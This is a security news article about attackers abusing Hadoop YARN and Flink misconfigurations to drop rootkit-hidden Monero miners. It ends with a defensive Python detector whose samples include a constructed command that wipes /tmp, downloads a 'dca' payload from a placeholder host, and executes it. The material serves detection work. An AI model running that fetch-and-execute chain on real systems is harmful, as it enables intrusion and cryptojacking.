Cybersecurity researchers have identified a new attack that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners within targeted environments.
“This attack is particularly interesting because of the attacker’s use of packers and rootkits to conceal the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. “The malware deletes contents of specific directories and modifies system configurations to evade detection.”
The infection chain targeting Hadoop leverages a misconfiguration in the YARN (Yet Another Resource Negotiator) ResourceManager, which is responsible for tracking resources in a cluster and scheduling applications.
Specifically, the misconfiguration can be exploited by an unauthenticated, remote threat actor to execute arbitrary code via a crafted HTTP request, subject to the privileges of the user on the node where the code is executed.
The attacks aimed at Apache Flink likewise target a misconfiguration that allows a remote attacker to achieve code execution without any authentication.
These misconfigurations are not novel and have been exploited in the past by financially motivated groups like TeamTNT, which is known for its history of targeting Docker and Kubernetes environments for cryptojacking and other malicious activities.
But what makes the latest set of attacks noteworthy is the use of rootkits to hide crypto mining processes after obtaining an initial foothold in Hadoop and Flink applications.
“The attacker sends an unauthenticated request to deploy a new application,” the researchers explained. “The attacker is able to run remote code by sending a POST request to the YARN, requesting to launch the new application with the attacker’s command.”
The command is purpose-built to clear the /tmp directory of all existing content, fetch a file called “dca” from a remote server, and execute it, followed by deleting all files in the /tmp directory once again.
The executed payload is a packed ELF binary that acts as a downloader to retrieve two rootkits and a Monero cryptocurrency miner binary. It is worth pointing out that various adversaries, including Kinsing, have resorted to using rootkits to conceal the presence of the mining process.
To achieve persistence, a cron job is created to download and execute a shell script that deploys the ‘dca’ binary. Further analysis of the threat actor’s infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.
As mitigations, it is recommended that organizations deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binaries, as well as other suspicious runtime behaviors.
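As an added illustration of the runtime detection the mitigation above calls for (this is example code written for this page, not Aqua's tooling), the following Python heuristics score a shell command line captured from a YARN container launch script or a process-execution agent against the chain the researchers describe: wipe /tmp, fetch a payload, execute it from /tmp, wipe /tmp again, persist via cron. The sample command lines and the `.invalid` host names are constructed for the example and are not from the incident.

```python
import re

# Indicators derived from the chain described in the article: wipe /tmp, fetch a
# payload from a remote host, execute it from /tmp, wipe /tmp again, persist via cron.
INDICATORS = {
    "tmp_wipe": re.compile(r"\brm\s+-\w*r\w*\s+/tmp(?:/\*)?(?=\s|;|&|\||$)"),
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b[^;|&]*https?://"),
    "exec_from_tmp": re.compile(r"chmod\s+\+x\s+/tmp/\S+|(?:^|[;&|])\s*/tmp/\S+"),
    "cron_persistence": re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron"),
}


def analyze_launch_command(command: str) -> dict:
    """Score one shell command line captured from a YARN container launch script
    or a runtime agent. Returns the indicators that fired and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
    tmp_wipes = len(INDICATORS["tmp_wipe"].findall(command))
    # Download-and-execute from /tmp is enough on its own; otherwise require
    # three independent indicators so a lone curl health check is not flagged.
    suspicious = {"remote_fetch", "exec_from_tmp"} <= set(hits) or len(hits) >= 3
    return {"hits": hits, "tmp_wipes": tmp_wipes, "suspicious": suspicious}


# Constructed samples (not captured from a real incident). Host names use the
# reserved .invalid TLD as placeholders.
SAMPLE_COMMANDS = [
    # Ordinary Spark application master launch: benign.
    "/usr/lib/jvm/java/bin/java -server -Xmx1024m "
    "org.apache.spark.deploy.yarn.ApplicationMaster --jar /tmp/job.jar",
    # Single outbound request, no execution: stays under the threshold.
    "curl -s http://metrics.internal.invalid/health && echo ok",
    # Pattern the article describes: wipe, fetch 'dca', run it, wipe again.
    "rm -rf /tmp/*; curl -o /tmp/dca http://staging.invalid/dca; "
    "chmod +x /tmp/dca; /tmp/dca; rm -rf /tmp/*",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(analyze_launch_command(cmd))
```

Only the third sample is flagged; the double /tmp wipe count is reported separately because it is the most distinctive part of this chain and is worth alerting on even before a payload is seen.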